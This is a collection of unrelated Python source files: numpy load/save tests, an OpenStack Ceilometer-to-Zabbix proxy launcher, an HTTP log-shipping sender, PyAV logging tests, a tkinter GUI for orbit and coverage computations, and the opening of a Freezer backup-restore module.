@pytest.mark.skipif(Path is None, reason="No pathlib.Path")
class TestPathUsage(object):
# Test that pathlib.Path can be used
def test_loadtxt(self):
with temppath(suffix='.txt') as path:
path = Path(path)
a = np.array([[1.1, 2], [3, 4]])
np.savetxt(path, a)
x = np.loadtxt(path)
assert_array_equal(x, a)
def test_save_load(self):
# Test that pathlib.Path instances can be used with save.
with temppath(suffix='.npy') as path:
path = Path(path)
a = np.array([[1, 2], [3, 4]], int)
np.save(path, a)
data = np.load(path)
assert_array_equal(data, a)
def test_save_load_memmap(self):
# Test that pathlib.Path instances can be loaded mem-mapped.
with temppath(suffix='.npy') as path:
path = Path(path)
a = np.array([[1, 2], [3, 4]], int)
np.save(path, a)
data = np.load(path, mmap_mode='r')
assert_array_equal(data, a)
# close the mem-mapped file
del data
def test_save_load_memmap_readwrite(self):
# Test that pathlib.Path instances can be written mem-mapped.
with temppath(suffix='.npy') as path:
path = Path(path)
a = np.array([[1, 2], [3, 4]], int)
np.save(path, a)
b = np.load(path, mmap_mode='r+')
a[0][0] = 5
b[0][0] = 5
del b # closes the file
data = np.load(path)
assert_array_equal(data, a)
def test_savez_load(self):
# Test that pathlib.Path instances can be used with savez.
with temppath(suffix='.npz') as path:
path = Path(path)
np.savez(path, lab='place holder')
with np.load(path) as data:
assert_array_equal(data['lab'], 'place holder')
def test_savez_compressed_load(self):
# Test that pathlib.Path instances can be used with savez.
with temppath(suffix='.npz') as path:
path = Path(path)
np.savez_compressed(path, lab='place holder')
data = np.load(path)
assert_array_equal(data['lab'], 'place holder')
data.close()
def test_genfromtxt(self):
with temppath(suffix='.txt') as path:
path = Path(path)
a = np.array([(1, 2), (3, 4)])
np.savetxt(path, a)
data = np.genfromtxt(path)
assert_array_equal(a, data)
def test_ndfromtxt(self):
# Test outputting a standard ndarray
with temppath(suffix='.txt') as path:
path = Path(path)
with path.open('w') as f:
f.write(u'1 2\n3 4')
control = np.array([[1, 2], [3, 4]], dtype=int)
test = np.ndfromtxt(path, dtype=int)
assert_array_equal(test, control)
def test_mafromtxt(self):
# From `test_fancy_dtype_alt` above
with temppath(suffix='.txt') as path:
path = Path(path)
with path.open('w') as f:
f.write(u'1,2,3.0\n4,5,6.0\n')
test = np.mafromtxt(path, delimiter=',')
control = ma.array([(1.0, 2.0, 3.0), (4.0, 5.0, 6.0)])
assert_equal(test, control)
def test_recfromtxt(self):
with temppath(suffix='.txt') as path:
path = Path(path)
with path.open('w') as f:
f.write(u'A,B\n0,1\n2,3')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.recfromtxt(path, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', int), ('B', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
def test_recfromcsv(self):
with temppath(suffix='.txt') as path:
path = Path(path)
with path.open('w') as f:
f.write(u'A,B\n0,1\n2,3')
kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
test = np.recfromcsv(path, dtype=None, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', int), ('B', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
def test_gzip_load():
a = np.random.random((5, 5))
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
np.save(f, a)
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.load(f), a)
def test_gzip_loadtxt():
# Thanks to another windows brokenness, we can't use
# NamedTemporaryFile: a file created from this function cannot be
# reopened by another open call. So we first put the gzipped string
# of the test reference array, write it to a securely opened file,
# which is then read from by the loadtxt function
s = BytesIO()
g = gzip.GzipFile(fileobj=s, mode='w')
g.write(b'1 2 3\n')
g.close()
s.seek(0)
with temppath(suffix='.gz') as name:
with open(name, 'wb') as f:
f.write(s.read())
res = np.loadtxt(name)
s.close()
assert_array_equal(res, [1, 2, 3])
def test_gzip_loadtxt_from_string():
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
f.write(b'1 2 3\n')
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.loadtxt(f), [1, 2, 3])
def test_npzfile_dict():
s = BytesIO()
x = np.zeros((3, 3))
y = np.zeros((3, 3))
np.savez(s, x=x, y=y)
s.seek(0)
z = np.load(s)
assert_('x' in z)
assert_('y' in z)
assert_('x' in z.keys())
assert_('y' in z.keys())
for f, a in z.items():
assert_(f in ['x', 'y'])
assert_equal(a.shape, (3, 3))
assert_(len(z.items()) == 2)
for f in z:
assert_(f in ['x', 'y'])
assert_('x' in z.keys())
@pytest.mark.skipif(not HAS_REFCOUNT, reason="Python lacks refcounts")
def test_load_refcount():
# Check that objects returned by np.load are directly freed based on
# their refcount, rather than needing the gc to collect them.
f = BytesIO()
np.savez(f, [1, 2, 3])
f.seek(0)
with assert_no_gc_cycles():
np.load(f)
f.seek(0)
dt = [("a", 'u1', 2), ("b", 'u1', 2)]
with assert_no_gc_cycles():
x = np.loadtxt(TextIO("0 1 2 3"), dtype=dt)
assert_equal(x, np.array([((0, 1), (2, 3))], dtype=dt))
|
proxy.py | #!/usr/bin/env python
"""
Proxy for integration of resources between OpenStack's Ceilometer and Zabbix
This proxy periodically checks for changes in Ceilometer's resources reporting them to Zabbix. It is also integrated
OpenStack's Nova and RabbitMQ for reflecting changes in Projects/Tenants and Instances
"""
############# NOTICE ######################
# ProZaC is a fork of ZabbixCeilometer-Proxy (aka ZCP),
# which is Copyright of OneSource Consultoria Informatica (http://www.onesource.pt).
# For further information about ZCP, check its github :
# https://github.com/clmarques/ZabbixCeilometer-Proxy
##########################################################
### ProZaC added functionalities (in this module) ########
#
# - support to file logging through python logging library
# - support to distinct AMQP servers for nova and keystone
#
### --------------------------- ##########################
__copyright__ = "Istituto Nazionale di Fisica Nucleare (INFN)"
__license__ = "Apache 2"
__contact__ = "emidio.giorgio@ct.infn.it"
__date__ = "15/11/2014"
__version__ = "0.9"
import sys, getopt
import threading
import project_handler
import nova_handler
import readFile
import token_handler
import zabbix_handler
import ceilometer_handler
import logging
from logging.handlers import RotatingFileHandler
def init_zcp(threads,conf_file):
"""
Method used to initialize the Proxy Zabbix - Ceilometer
"""
log_levels={"DEBUG":logging.DEBUG,"INFO":logging.INFO,
"WARNING":logging.WARNING,"ERROR":logging.ERROR,
"CRITICAL":logging.CRITICAL}
conf_file = readFile.ReadConfFile(conf_file)
zcp_logger=logging.getLogger('ZCP')
zcp_logHandler = RotatingFileHandler(conf_file.read_option('zcp_configs','log_file'),
mode='a',maxBytes=99999,
backupCount=7)
zcp_logHandler.setFormatter(logging.Formatter('%(asctime)-4s %(levelname)-4s %(message)s'))
zcp_logger.addHandler(zcp_logHandler)
zcp_logger.setLevel(log_levels[conf_file.read_option('zcp_configs','log_level')])
zcp_logger.info("***********************************************************************")
zcp_logger.info("Prozac is starting")
zcp_logger.info("Loading configuration options from %s" %(conf_file.conf_file_name))
# Creation of the Auth keystone-dedicated authentication class
# Responsible for managing AAA related requests
keystone_auth = token_handler.Auth(conf_file.read_option('keystone_authtoken', 'keystone_host'),
conf_file.read_option('keystone_authtoken', 'keystone_public_port'),
conf_file.read_option('keystone_authtoken', 'admin_tenant'),
conf_file.read_option('keystone_authtoken', 'admin_user'),
conf_file.read_option('keystone_authtoken', 'admin_password'))
# Creation of the Zabbix Handler class
# Responsible for the communication with Zabbix
zabbix_hdl = zabbix_handler.ZabbixHandler(conf_file.read_option('keystone_authtoken', 'keystone_admin_port'),
conf_file.read_option('keystone_authtoken', 'nova_compute_listen_port'),
conf_file.read_option('zabbix_configs', 'zabbix_admin_user'),
conf_file.read_option('zabbix_configs', 'zabbix_admin_pass'),
conf_file.read_option('zabbix_configs', 'zabbix_host'),
conf_file.read_option('keystone_authtoken', 'keystone_host'),
conf_file.read_option('zcp_configs', 'template_name'),
conf_file.read_option('zcp_configs', 'zabbix_proxy_name'), keystone_auth)
# Creation of the Ceilometer Handler class
# Responsible for the communication with OpenStack's Ceilometer, polling for changes every N seconds
ceilometer_hdl = ceilometer_handler.CeilometerHandler(conf_file.read_option('ceilometer_configs', 'ceilometer_api_port'),
conf_file.read_option('zcp_configs', 'polling_interval'),
conf_file.read_option('zcp_configs', 'template_name'),
conf_file.read_option('ceilometer_configs', 'ceilometer_api_host'),
conf_file.read_option('zabbix_configs', 'zabbix_host'),
conf_file.read_option('zabbix_configs', 'zabbix_port'),
conf_file.read_option('zcp_configs', 'zabbix_proxy_name'),
keystone_auth)
zcp_logger.info("Listeners have been initialized, ready for Zabbix first run")
#First run of the Zabbix handler for retrieving the necessary information
zabbix_hdl.first_run()
# Creation of the Nova Handler class
# Responsible for detecting the creation of new instances in OpenStack, translated then to Hosts in Zabbix
# nova_hdl = nova_handler.NovaEvents(conf_file.read_option('os_rabbitmq', 'rabbit_host'),
# conf_file.read_option('os_rabbitmq', 'rabbit_user'),
# conf_file.read_option('os_rabbitmq', 'rabbit_pass'), zabbix_hdl,
# ceilometer_hdl)
nova_hdl = nova_handler.NovaEvents(conf_file.read_option('rpc_settings','rpc_nova_type'),
conf_file.read_option('rpc_settings','rpc_nova_host'),
conf_file.read_option('rpc_settings','rpc_nova_user'),
conf_file.read_option('rpc_settings','rpc_nova_pass'),
zabbix_hdl, ceilometer_hdl
)
# Creation of the Project Handler class
# Responsible for detecting the creation of new tenants in OpenStack, translated then to HostGroups in Zabbix
# project_hdl = project_handler.ProjectEvents(conf_file.read_option('os_rabbitmq', 'rabbit_host'),
# conf_file.read_option('os_rabbitmq', 'rabbit_user'),
# conf_file.read_option('os_rabbitmq', 'rabbit_pass'), zabbix_hdl)
project_hdl= project_handler.ProjectEvents(conf_file.read_option('rpc_settings','rpc_keystone_type'),
conf_file.read_option('rpc_settings','rpc_keystone_host'),
conf_file.read_option('rpc_settings','rpc_keystone_user'),
conf_file.read_option('rpc_settings','rpc_keystone_pass'),
zabbix_hdl
)
#Create and append threads to threads list
th1 = threading.Thread(target=project_hdl.keystone_listener)
threads.append(th1)
th2 = threading.Thread(target=nova_hdl.nova_listener)
threads.append(th2)
th3 = threading.Thread(target=ceilometer_hdl.run())
threads.append(th3)
#start all the threads
[th.start() for th in threads]
if __name__ == '__main__':
configuration_file="/root/ZabbixCeilometer-Proxy/proxy.conf"
try:
opts,args=getopt.getopt(sys.argv[1:],"hc:",["--help","conf="])
except getopt.GetoptError:
print sys.argv[0]+" -c <configuration file>"
sys.exit(2)
for opt,arg in opts:
if opt in ("-h","--help"):
print sys.argv[0]+" -c <configuration file>"
sys.exit(0)
elif opt in ("-c","--conf"):
configuration_file=arg
print "Configuration file is "+configuration_file
threads = []
init_zcp(threads,configuration_file)
#wait for all threads to complete
[th.join() for th in threads]
# this will never be printed, as daemon is
# killed by shell
# zcp_logger.info("Prozac terminated")
|
sender.py | # This class is responsible for handling all asynchronous http
# communication
import sys
from time import sleep
from datetime import datetime
from threading import Thread, enumerate
import logging
import requests
if sys.version[0] == '2':
import Queue as queue
else:
import queue as queue
MAX_BULK_SIZE_IN_BYTES = 1 * 1024 * 1024 # 1 MB
def get_logger(debug):
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG if debug else logging.INFO)
logger.addHandler(logging.StreamHandler(sys.stdout))
return logger
def backup_logs(logs, logger):
timestamp = datetime.now().strftime('%Y%m%d%H%M%S')
logger.info('Backing up your logs to http-upload-failures-%s.txt', timestamp)
with open('http-upload-failures-{}.txt'.format(timestamp), 'a') as f:
f.writelines('\n'.join(logs))
class HttpSender:
def __init__(self,
url,
logs_drain_timeout=5,
debug=False):
self.url = url
self.logs_drain_timeout = logs_drain_timeout
self.logger = get_logger(debug)
# Function to see if the main thread is alive
self.is_main_thread_active = lambda: any(
(i.name == 'MainThread') and i.is_alive() for i in enumerate())
# Create a queue to hold logs
self.queue = queue.Queue()
self._initialize_sending_thread()
def _initialize_sending_thread(self):
self.sending_thread = Thread(target=self._drain_queue)
self.sending_thread.daemon = False
self.sending_thread.name = 'http-sending-thread'
self.sending_thread.start()
def append(self, logs_message):
if not self.sending_thread.is_alive():
self._initialize_sending_thread()
# Queue lib is thread safe, no issue here
self.queue.put(logs_message)
def flush(self):
self._flush_queue()
def _drain_queue(self):
last_try = False
while not last_try:
# If main is exited, we should run one last time and try to remove
# all logs
if not self.is_main_thread_active():
self.logger.debug(
'Identified quit of main thread, sending logs one '
'last time')
last_try = True
try:
self._flush_queue()
except Exception as e:
self.logger.debug(
'Unexpected exception while draining queue to url, ' + str(self.url) +
'swallowing. Exception: %s', e)
if not last_try:
sleep(self.logs_drain_timeout)
def _flush_queue(self):
# Sending logs until queue is empty
while not self.queue.empty():
logs_list = self._get_messages_up_to_max_allowed_size()
self.logger.debug(
'Starting to drain %s logs to url' + str(self.url) + str(len(logs_list)))
# Not configurable from the outside
sleep_between_retries = 2
number_of_retries = 4
should_backup_to_disk = True
headers = {"Content-type": "text/plain"}
for current_try in range(number_of_retries):
should_retry = False
try:
response = requests.post(
self.url, headers=headers, data='\n'.join(logs_list))
if response.status_code != 200:
if response.status_code == 400:
self.logger.info(
'Got 400 code from url ' + str(self.url) + '. This means that '
'some of your logs are too big, or badly '
'formatted. response: %s', response.text)
should_backup_to_disk = False
break
if response.status_code == 401:
self.logger.info(
'You are not authorized with url ' + str(self.url) + '! Token '
'OK? dropping logs...')
should_backup_to_disk = False
break
else:
self.logger.info(
'Got %s while sending logs to url ' + str(self.url) + ', '
'Try (%s/%s). Response: %s',
response.status_code,
current_try + 1,
number_of_retries,
response.text)
should_retry = True
else:
self.logger.debug(
'Successfully sent bulk of %s logs to '
'url ' + str(self.url), len(logs_list))
should_backup_to_disk = False
break
except Exception as e:
self.logger.error(
'Got exception while sending logs to url ' + str(self.url) + ', '
'Try (%s/%s). Message: %s',
current_try + 1, number_of_retries, e)
should_retry = True
if should_retry:
sleep(sleep_between_retries)
sleep_between_retries *= 2
if should_backup_to_disk:
# Write to file
self.logger.info(
'Could not send logs to url ' + str(self.url) + ' after %s tries, '
'backing up to local file system', number_of_retries)
backup_logs(logs_list, self.logger)
def _get_messages_up_to_max_allowed_size(self):
logs_list = []
current_size = 0
while not self.queue.empty():
current_log = self.queue.get()
current_size += sys.getsizeof(current_log)
logs_list.append(current_log)
if current_size >= MAX_BULK_SIZE_IN_BYTES:
break
return logs_list
|
test_logging.py | from __future__ import division
import logging
import threading
import av.error
import av.logging
from .common import TestCase
def do_log(message):
av.logging.log(av.logging.INFO, 'test', message)
class TestLogging(TestCase):
def test_adapt_level(self):
self.assertEqual(
av.logging.adapt_level(av.logging.ERROR),
logging.ERROR
)
self.assertEqual(
av.logging.adapt_level(av.logging.WARNING),
logging.WARNING
)
self.assertEqual(
av.logging.adapt_level((av.logging.WARNING + av.logging.ERROR) // 2),
logging.WARNING
)
def test_threaded_captures(self):
with av.logging.Capture(local=True) as logs:
do_log('main')
thread = threading.Thread(target=do_log, args=('thread', ))
thread.start()
thread.join()
self.assertIn((av.logging.INFO, 'test', 'main'), logs)
def test_global_captures(self):
with av.logging.Capture(local=False) as logs:
do_log('main')
thread = threading.Thread(target=do_log, args=('thread', ))
thread.start()
thread.join()
self.assertIn((av.logging.INFO, 'test', 'main'), logs)
self.assertIn((av.logging.INFO, 'test', 'thread'), logs)
def test_repeats(self):
with av.logging.Capture() as logs:
do_log('foo')
do_log('foo')
do_log('bar')
do_log('bar')
do_log('bar')
do_log('baz')
logs = [l for l in logs if l[1] == 'test']
self.assertEqual(logs, [
(av.logging.INFO, 'test', 'foo'),
(av.logging.INFO, 'test', 'foo'),
(av.logging.INFO, 'test', 'bar'),
(av.logging.INFO, 'test', 'bar (repeated 2 more times)'),
(av.logging.INFO, 'test', 'baz'),
])
def test_error(self):
log = (av.logging.ERROR, 'test', 'This is a test.')
av.logging.log(*log)
try:
av.error.err_check(-1)
except OSError as e:
self.assertEqual(e.log, log)
else:
self.fail()
|
executeframe.py | from tkinter import ttk
import tkinter as tk
from eosim.config import GuiStyle, MissionConfig, OutputConfig
from eosim import config
import random
from tkinter import messagebox
import json
import orbitpy
import tkinter.filedialog, tkinter.messagebox
from instrupy.public_library import Instrument
from instrupy.util import *
import os
import shutil
import sys
import csv
import glob
from orbitpy import preprocess, orbitpropcov, communications, obsdatametrics, util
import threading
import time
import pandas as pd
import pickle
import copy
import matplotlib.pyplot as plt
import matplotlib
matplotlib.rc('font', family='sans-serif')
matplotlib.rc('font', serif='Times New Roman')
matplotlib.rc('text', usetex='false')
matplotlib.rcParams.update({'font.size': 12})
import logging
logger = logging.getLogger(__name__)
class ExecuteFrame(ttk.Frame):
BTNWIDTH = 15
def __init__(self, parent, controller):
ttk.Frame.__init__(self, parent)
self.controller = controller
self.rowconfigure(0,weight=1)
self.rowconfigure(1,weight=1)
self.rowconfigure(2,weight=1)
self.columnconfigure(0,weight=1)
self.columnconfigure(1,weight=1)
self.columnconfigure(2,weight=1)
# define propagation execution frame
pexec_frame = ttk.Frame(self)
pexec_frame.grid(row=0, column=0, ipadx=10, ipady=10, padx=10, pady=10, sticky='nswe')
pexec_frame.columnconfigure(0,weight=1)
pexec_frame.rowconfigure(0,weight=1)
covexec_frame = ttk.Frame(self)
covexec_frame.grid(row=0, column=1, ipadx=10, ipady=10, padx=10, pady=10, sticky='nswe')
covexec_frame.columnconfigure(0,weight=1)
covexec_frame.rowconfigure(0,weight=1)
gndconexec_frame = ttk.Frame(self)
gndconexec_frame.grid(row=0, column=2, ipadx=10, ipady=10, padx=10, pady=10, sticky='nswe')
gndconexec_frame.columnconfigure(0,weight=1)
gndconexec_frame.rowconfigure(0,weight=1)
sat2satconexec_frame = ttk.Frame(self)
sat2satconexec_frame.grid(row=1, column=0, ipadx=10, ipady=10, padx=10, pady=10, sticky='nswe')
sat2satconexec_frame.columnconfigure(0,weight=1)
sat2satconexec_frame.rowconfigure(0,weight=1)
obsmetcalcsexec_frame = ttk.Frame(self)
obsmetcalcsexec_frame.grid(row=1, column=1, ipadx=10, ipady=10, padx=10, pady=10, sticky='nswe')
obsmetcalcsexec_frame.columnconfigure(0,weight=1)
obsmetcalcsexec_frame.rowconfigure(0,weight=1)
progressbar_frame = ttk.Frame(self)
progressbar_frame.grid(row=2, column=0, columnspan=3, ipadx=10, ipady=10, padx=10, pady=10, sticky='nswe')
progressbar_frame.columnconfigure(0,weight=1)
progressbar_frame.rowconfigure(0,weight=1)
# define the widgets inside the frames
progress_bar = ttk.Progressbar(progressbar_frame, orient='horizontal', length=300, mode='indeterminate')
progress_bar.grid(row=0, column=0, padx=20, sticky='n')
pexec_btn = tk.Button(pexec_frame, text="Orbit Propagator", width=40, wraplength=100, command=lambda:self.click_pexec_btn(progress_bar))
pexec_btn.grid(row=0, column=0, padx=20, ipady=10, pady=5, sticky='s')
covexec_btn = tk.Button(covexec_frame, text="Coverage Calculator", width=40, wraplength=100, command=lambda:self.click_covexec_btn(progress_bar))
covexec_btn.grid(row=0, column=0, padx=20, ipady=10, pady=5, sticky='s')
gndconexec_btn = tk.Button(gndconexec_frame, text="Ground-Station Contact Finder", width=40, wraplength=100, command=lambda:self.click_gndconexec_btn(progress_bar))
gndconexec_btn.grid(row=0, column=0, padx=20, ipady=10, pady=5, sticky='s')
sat2satconexec_btn = tk.Button(sat2satconexec_frame, text="Sat-to-Sat Contact Finder", width=40, wraplength=100, command=lambda:self.click_sat2satconexec_btn(progress_bar))
sat2satconexec_btn.grid(row=0, column=0, padx=20, ipady=10, pady=5, sticky='s')
obsmetcalcexec_btn = tk.Button(obsmetcalcsexec_frame, text="Obs-metrics Calculator", width=40, wraplength=100, command=lambda:self.click_obsmetcalcexec_btn(progress_bar))
obsmetcalcexec_btn.grid(row=0, column=0, padx=20, ipady=10, pady=5, sticky='s')
def click_gndconexec_btn(self, progress_bar):
def real_click_gndconexec_btn():
# Execute ground-station contact finder
user_dir = config.out_config.get_user_dir()
# Gather the required inputs
with open(user_dir+ 'comm_param.p', 'rb') as f:
comm_dir = pickle.load(f)
gnd_stn_fl = pickle.load(f)
ground_stn_info = pickle.load(f)
prop_cov_param = pickle.load( open(user_dir+ "prop_cov_param.p", "rb" ) )
sat_ids = [] # list of satellites (ids)
sat_dirs = [] # list of directories where the ground station output is written
sat_state_fls = [] # list of the state files
for _indx in range(0,len(prop_cov_param)):
pcp = copy.deepcopy(prop_cov_param[_indx])
sat_ids.append(pcp.sat_id)
sat_state_fls.append(pcp.sat_state_fl)
_dir = "/".join([str(x) for x in pcp.sat_state_fl.split("/")[0:-1]])+'/'
sat_dirs.append(_dir)
ocf = user_dir + 'output.json'
try:
with open(ocf, 'r') as output_config_file:
_out_config = util.FileUtilityFunctions.from_json(output_config_file)
config.out_config = OutputConfig.from_dict(_out_config)
except:
raise Exception("Output Configuration not found.")
progress_bar.start(10)
if gnd_stn_fl is None and ground_stn_info is None:
logger.info("No ground-stations are specified")
else:
logger.info(".......Computing satellite-to-ground-station contact periods.......")
# compute for 1 satellite at a time to keep track of which satellites (ids) the resulting files belong to
for k in range(0,len(sat_ids)):
gnd_stn_comm = communications.GroundStationComm(sat_dirs=sat_dirs[k], sat_state_fls=sat_state_fls[k], gnd_stn_fl=gnd_stn_fl, ground_stn_info=ground_stn_info)
[gnd_stn_i, gndstncomm_concise_fls, gndstncomm_detailed_fls] = gnd_stn_comm.compute_all_contacts()
# update output configuration file
config.out_config.update_ground_stns_comm(sat_id=sat_ids[k], gnd_stn_id = gnd_stn_i, gndstncomm_concise_fls=gndstncomm_concise_fls, gndstncomm_detailed_fls=gndstncomm_detailed_fls)
logger.info(".......DONE.......")
with open(ocf, 'w', encoding='utf-8') as f:
json.dump(config.out_config.to_dict(), f, ensure_ascii=False, indent=4)
progress_bar.stop()
# execute propagation
threading.Thread(target=real_click_gndconexec_btn).start()
def click_sat2satconexec_btn(self, progress_bar):
def real_click_sat2satconexec_btn():
# Execute sat-to-sat contact finder
user_dir = config.out_config.get_user_dir()
# Gather the required inputs
with open(user_dir+ 'preprocess_data.p', 'rb') as f:
pi = pickle.load(f)
with open(user_dir+ 'comm_param.p', 'rb') as f:
comm_dir = pickle.load(f)
gnd_stn_fl = pickle.load(f)
ground_stn_info = pickle.load(f)
prop_cov_param = pickle.load( open(user_dir+ "prop_cov_param.p", "rb" ) )
sat_ids = [] # list of satellites (ids)
sat_dirs = [] # list of directories where the ground station output is written
sat_state_fls = [] # list of the state files
for _indx in range(0,len(prop_cov_param)):
pcp = copy.deepcopy(prop_cov_param[_indx])
sat_ids.append(pcp.sat_id)
sat_state_fls.append(pcp.sat_state_fl)
_dir = "/".join([str(x) for x in pcp.sat_state_fl.split("/")[0:-1]])+'/'
sat_dirs.append(_dir)
ocf = user_dir + 'output.json'
try:
with open(ocf, 'r') as output_config_file:
_out_config = util.FileUtilityFunctions.from_json(output_config_file)
config.out_config = OutputConfig.from_dict(_out_config)
except:
raise Exception("Output Configuration not found.")
logger.info(".......Computing satellite-to-satellite contact periods.......")
progress_bar.start(10)
opaque_atmos_height_km = pi.opaque_atmos_height_km
logger.info("Considering opaque atmospheric height to be : " + str(opaque_atmos_height_km) + "km")
inter_sat_comm = communications.InterSatelliteComm(sat_ids, sat_state_fls, comm_dir, opaque_atmos_height_km)
[sat1_ids, sat2_ids, intersatcomm_concise_fls, intersatcomm_detailed_fls] = inter_sat_comm.compute_all_contacts()
config.out_config.update_intersatcomm(sat1_ids=sat1_ids, sat2_ids=sat2_ids, intersatcomm_concise_fls=intersatcomm_concise_fls, intersatcomm_detailed_fls=intersatcomm_detailed_fls)
logger.info(".......DONE.......")
with open(ocf, 'w', encoding='utf-8') as f:
json.dump(config.out_config.to_dict(), f, ensure_ascii=False, indent=4)
progress_bar.stop()
# execute propagation
threading.Thread(target=real_click_sat2satconexec_btn).start()
def click_obsmetcalcexec_btn(self, progress_bar):
def real_click_obsmetcalcexec_btn():
# Execute observation metrics calculations
user_dir = config.out_config.get_user_dir()
usf = user_dir + 'MissionSpecs.json'
try:
with open(usf, 'r') as mission_specs_file:
miss_specs = util.FileUtilityFunctions.from_json(mission_specs_file)
except:
raise Exception("Mission Configuration not found.")
progress_bar.start(10)
# read in the preprocessed data
with open(user_dir+ 'preprocess_data.p', 'rb') as f:
pi = pickle.load(f)
if "instrument" in miss_specs:
instru_specs = miss_specs['instrument']
elif "satellite" in miss_specs:
instru_specs = []
for sat in miss_specs["satellite"]:
if("instrument" in sat):
instru_specs.extend(sat["instrument"])
if(instru_specs is not None):
logger.info("Started computation of observation metrics")
obs = obsdatametrics.ObsDataMetrics(pi.sats)
[sat_id, ssid, obsMetrics_fl] = obs.compute_all_obs_metrics()
logger.info("Computed observation metrics")
else:
logger.info("No instruments present, skinng computation of observation metrics")
pass
# update output configuration file
ocf = user_dir + 'output.json'
try:
with open(ocf, 'r') as output_config_file:
_out_config = util.FileUtilityFunctions.from_json(output_config_file)
config.out_config = OutputConfig.from_dict(_out_config)
except:
raise Exception("Output Configuration not found.")
config.out_config.update_calc_obsmetrics(sat_id=sat_id, ssid=ssid, obsMetrics_fl=obsMetrics_fl)
with open(ocf, 'w', encoding='utf-8') as f:
json.dump(config.out_config.to_dict(), f, ensure_ascii=False, indent=4)
progress_bar.stop()
# execute propagation
threading.Thread(target=real_click_obsmetcalcexec_btn).start()
def click_pexec_btn(self, progress_bar):
def real_click_pexec_btn():
# Execute propagation
user_dir = config.out_config.get_user_dir()
usf = user_dir + 'MissionSpecs.json'
try:
with open(usf, 'r') as mission_specs_file:
miss_specs = util.FileUtilityFunctions.from_json(mission_specs_file)
except:
raise Exception("Configuration not found.")
progress_bar.start(10)
# read in the preprocessed propagation and coverage parameters
prop_cov_param = pickle.load(open(user_dir+"prop_cov_param.p", "rb"))
# Run orbit propagation for each of the satellties (orbits) in the constellation
sat_id = [] # list of propagated satellites (ids)
sat_eci_state_fp = [] # list of the eci-state files
sat_kep_state_fp = [] # list of the Keplerian-state files
for orb_indx in range(0,len(prop_cov_param)):
pcp = copy.deepcopy(prop_cov_param[orb_indx])
pcp.cov_calcs_app = util.CoverageCalculationsApproach.SKIP # force skip of coverage calculations
opc = orbitpropcov.OrbitPropCov(pcp)
logger.info(".......Running Orbit Propagation for satellite " + str(pcp.sat_id))
opc.run()
sat_id.append(pcp.sat_id)
sat_eci_state_fp.append(pcp.sat_state_fl)
sat_kep_state_fp.append(pcp.sat_state_fl + '_Keplerian')
logger.info(".......Done.......")
# save output configuration file (any previous configuration is re-written since propagation is the first step
# to any of the future calculations such as coverage or communications, etc)
config.out_config.update_prop_out(sat_id=sat_id, sat_eci_state_fp=sat_eci_state_fp, sat_kep_state_fp=sat_kep_state_fp)
with open(user_dir + 'output.json', 'w', encoding='utf-8') as f:
json.dump(config.out_config.to_dict(), f, ensure_ascii=False, indent=4)
progress_bar.stop()
# execute propagation
threading.Thread(target=real_click_pexec_btn).start()
def click_covexec_btn(self, progress_bar):
def real_click_covexec_btn():
# Execute coverage calculations
user_dir = config.out_config.get_user_dir()
usf = user_dir + 'MissionSpecs.json'
try:
with open(usf, 'r') as mission_specs_file:
miss_specs = util.FileUtilityFunctions.from_json(mission_specs_file)
except:
raise Exception("Mission Configuration not found.")
progress_bar.start(10)
# read in the preprocessed propagation and coverage parameters
prop_cov_param = pickle.load( open(user_dir+ "prop_cov_param.p", "rb" ) )
# Run coverage for each of the satellties (orbits) in the constellation
sat_id = [] # list of satellites (ids) for which coverage is calculated
sat_acc_fl = [] # list of the access files
for orb_indx in range(0,len(prop_cov_param)):
pcp = copy.deepcopy(prop_cov_param[orb_indx])
pcp.do_prop = False # force skip of propagation calculations
opc = orbitpropcov.OrbitPropCov(pcp)
logger.info(".......Running Coverage calculations for satellite " + str(pcp.sat_id) + "....")
opc.run()
sat_id.append(pcp.sat_id)
sat_acc_fl.append(pcp.sat_acc_fl)
logger.info(".......Done.......")
# update output configuration file
ocf = user_dir + 'output.json'
try:
with open(ocf, 'r') as output_config_file:
_out_config = util.FileUtilityFunctions.from_json(output_config_file)
config.out_config = OutputConfig.from_dict(_out_config)
except:
raise Exception("Output Configuration not found.")
config.out_config.update_cov_out(sat_id=sat_id, sat_acc_fl=sat_acc_fl)
with open(ocf, 'w', encoding='utf-8') as f:
json.dump(config.out_config.to_dict(), f, ensure_ascii=False, indent=4)
progress_bar.stop()
# execute propagation
threading.Thread(target=real_click_covexec_btn).start()
|
restore.py | '''
Copyright 2014 Hewlett-Packard
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
This product includes cryptographic software written by Eric Young
(eay@cryptsoft.com). This product includes software written by Tim
Hudson (tjh@cryptsoft.com).
========================================================================
Freezer restore modes related functions
'''
from freezer.tar import tar_restore
from freezer.swift import object_to_stream
from freezer.utils import (
validate_all_args, get_match_backup, sort_backup_list)
from multiprocessing import Process, Pipe
import os
import logging
import re
import datetime
import time
def restore_fs(backup_opt_dict):
'''
Restore data from swift server to your local node. Data will be restored
in the directory specified in backup_opt_dict.restore_abs_path. The
object specified with the --get-object option will be downloaded from
the Swift server and will be downloaded inside the parent directory of
backup_opt_dict.restore_abs_path. If the object was compressed during
backup time, then it is decrypted, decompressed and de-archived to
backup_opt_dict.restore_abs_path. Before download the file, the size of
the local volume/disk/partition will be computed. If there is enough space
the full restore will be executed. Please remember to stop any service
that require access to the data before to start the restore execution
and to start the service at the end of the restore execution
'''
# List of mandatory values
required_list = [
os.path.exists(backup_opt_dict.restore_abs_path),
backup_opt_dict.remote_obj_list,
backup_opt_dict.container,
backup_opt_dict.backup_name
]
